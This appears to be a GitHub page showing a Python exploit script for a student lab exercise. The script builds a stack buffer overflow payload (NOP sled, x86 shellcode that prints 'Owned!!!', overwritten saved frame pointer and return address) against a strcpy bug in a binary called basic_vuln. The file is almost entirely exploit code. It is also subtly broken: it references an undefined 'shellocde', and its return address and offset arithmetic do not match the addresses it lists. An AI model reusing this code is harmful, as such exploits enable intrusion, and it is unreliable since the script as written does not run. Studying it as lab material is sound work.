-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathexploit_basic_vuln.py
More file actions
33 lines (24 loc) · 1.06 KB
/
exploit_basic_vuln.py
File metadata and controls
33 lines (24 loc) · 1.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Author: Abhinav Thakur
# Email : compilepeace@gmail.com
# Source file : /home/student/labs/basic_vuln.c
# binary file : basic_vuln
# Description : This exploit takes advantage of the usage of strcpy() in the binary which copies the
# user input without validating the length of input. This leads to possibility of stack
# corruption
#
# Usage : ./basic_vuln $(cat basic_vuln_malacious_input)
import struct
# user input: 0xbffff7a9
# main()'s local buffer: 0xbffff588
# Saved Frame pointer: 0xbffff5c8
# Return pointer : 0xbffff5cc
# Value at ebp : 0xbffff5e8
# offset to return pointer (from main()'s local buffer): 0xbffff588 - 0xbffff5cc = 68 bytes
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
payload = "\x90" * 30
payload += shellocde
payload += struct.pack("I", 0xbffff5e8) # value of saved ebp
payload += struct.pack("I", 0xbffff558) # return address (somewhere on stack)
fo = open('basic_vuln_malacious_input', 'w')
fo.write(payload)
fo.close()